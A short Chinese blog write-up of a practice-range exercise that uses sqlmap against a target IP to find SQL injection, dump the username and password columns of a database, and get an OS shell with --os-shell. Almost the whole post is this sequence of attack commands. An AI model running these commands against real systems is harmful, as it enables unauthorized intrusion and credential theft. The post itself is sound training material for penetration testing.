WriteUp:Kali渗透 - 通过Sqlmap直接获得服务器权限

靶场链接:https://hack.zkaq.cn/battle/target?id=aabe6f2bda75107c

使用sqlmap进行渗透测试

  • 找到可能存在注入点的网站,http://59.63.200.79:6453/single.php?id=1放到sqlmap上跑: sqlmap -u "http://59.63.200.79:6453/single.php?id=1" 发现三个SQL漏洞:
    在这里插入图片描述

  • 爆库:sqlmap -u "http://59.63.200.79:6453/single.php?id=1" --dbs

  • 爆表:sqlmap -u "http://59.63.200.79:6453/single.php?id=1" -D cake --tables --batch

  • 爆字段:sqlmap -u "http://59.63.200.79:6453/single.php?id=1" -D cake -T user --columns --batch

  • 爆值:sqlmap -u "http://59.63.200.79:6453/single.php?id=1" -D cake -T user -C username --dump --batch sqlmap -u "http://59.63.200.79:6453/single.php?id=1" -D cake -T user -C passwd --dump --batch

  • 获取服务器权限:sqlmap -u "http://59.63.200.79:6453/single.php?id=1" --os-shell
    在这里插入图片描述
    在这里插入图片描述
    是PHP,输入4在这里插入图片描述

  • 为所欲为

posted @ 2021-08-18 16:58  Zeker62  阅读(314)  评论(0编辑  收藏  举报